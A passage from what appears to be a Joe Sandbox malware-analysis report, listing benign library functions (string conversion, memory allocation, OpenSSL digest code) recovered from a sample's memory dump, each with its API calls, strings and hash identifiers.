                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction ID: 86bc758df66e70b29581eacb04a4d506c06b20533931aaece1396c88c179fdae
                                                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                                                        • Instruction Fuzzy Hash: DF01423241014EBBCF126E94CC419ED7FA2FB29354F548496FA1958231E236C9B1AB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA27A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00BA27B9
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA27C3
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA27CE
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00BA27E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction ID: 445921e414d7541ce6a20c3567e08029c2da0256dbf48c2bc3843144633dbffb
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d9dcaad5f8e4261795bcea76ca99668f9772f2743072d2b2585248bbbc150a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 70F02735701304BFE7206A659C8AFBB7ADDEBC6761F100165B604F32C1EAA16D0152F1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 00BA2806
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA2814
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA281F
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00BA2832
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                                                        • Opcode ID: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction ID: 96f683d75dd3ea213c532f80157fa295b80504112c23f64960666895dab6705c
                                                                                                                                                                        • Opcode Fuzzy Hash: f34d7beaba954fe784c15103568276d2e5cb28271367e0561eef23a3f864c028
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E08C7A3016247FE51027596C8AFBF6A5CCBC27B6F100252F611E22E2CAE05C0281B0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA4920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 5136eaa27dc19adf402dcb258a9fde3a36f30e423d14d3366af1e1a33feaa86b
                                                                                                                                                                        • Instruction ID: 7b794273970480c62e98a6a457eb00d663ccb297d585f3a94b9e4ee660671495
                                                                                                                                                                        • Opcode Fuzzy Hash: 5136eaa27dc19adf402dcb258a9fde3a36f30e423d14d3366af1e1a33feaa86b
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C13730608209DBCF24CF58D9C09AAB3F6FFC6300B6045ADE8468B655DBB0ED55CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C00040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                                                        • Opcode ID: 39d276ddad72ab70d019255668fa086557507311c043cb68aa54c21788d6ca66
                                                                                                                                                                        • Instruction ID: 18504c4efdb3d22cdf3fbfc233ad8afd1acaba16a1214a721df5e290ce2f4694
                                                                                                                                                                        • Opcode Fuzzy Hash: 39d276ddad72ab70d019255668fa086557507311c043cb68aa54c21788d6ca66
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B51E87174030627E730AEA6DC82F7B77DCDF41B54F260429FA24951C2EBA5EA44D271
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C10620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00C10686
                                                                                                                                                                          • Part of subcall function 00BE4C00: _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                        Strings
                                                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00C1062E
                                                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00C10638
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset_raise
                                                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                                                        • Opcode ID: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction ID: 77a43228e8f1018fab35f714dd25c5014fe4b4c519b5b4bc633e86866c4ff27f
                                                                                                                                                                        • Opcode Fuzzy Hash: 32ec546d98c41d3935baa6bd1a205643af333bcb26953fd5a2ecaae3244242cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 43014B75600200AFC310DF48EC42E6AB7E5AFC9304F294468F988DB362D7A1ED95DB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%